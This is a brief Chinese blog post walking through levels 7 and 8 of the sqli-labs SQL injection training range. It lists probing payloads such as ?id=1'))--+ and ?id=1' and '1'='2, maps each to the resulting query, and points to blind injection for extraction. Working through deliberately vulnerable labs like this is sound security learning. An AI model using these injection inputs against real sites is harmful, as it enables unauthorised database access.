本文主要是介绍SQL注入sqli_labs靶场第七、八题,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
第七题
根据报错信息
?id=1' and '1'='1 返回页面正常 ------对应查询SQL:where id=(('1' and '1'='1'));
?id=1' and '1'='2 返回页面报错 ------对应查询SQL:where id=(('1' and '1'='2'));
判断为字符型注入
?id=1" 返回页面正常 ---------对应查询SQL:where id=(('1"'))
?id=1'--+ 返回页面报错 ---------对应查询SQL:where id=(('1'--+')) -----破坏SQL语句原有结构
?id=1')--+ 返回页面报错 --------对应查询SQL:where id=(('1')--+'))
?id=1'))--+ 返回页面正常 --------对应查询SQL:where id=(('1'))--+'))
注入形式为:?id=1'))
没有回显点,尝试盲注,与第五题方法相同
SQL注入sqli_labs靶场第五题
第八题
?id=1 and 1=1 页面正常
?id=1 and 1=2 页面正常
?id=1' and '1'='1 页面正常
?id=1' and '1'='2 页面不正常,无回显信息
判断为字符型注入
?id=1'--+ 页面正常,无回显信息 -------------------SQL查询语句:where id='1'--+'
注入形式为?id=1''
没有回显点,尝试盲注,与第五题方法相同
SQL注入sqli_labs靶场第五题
这篇关于SQL注入sqli_labs靶场第七、八题的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
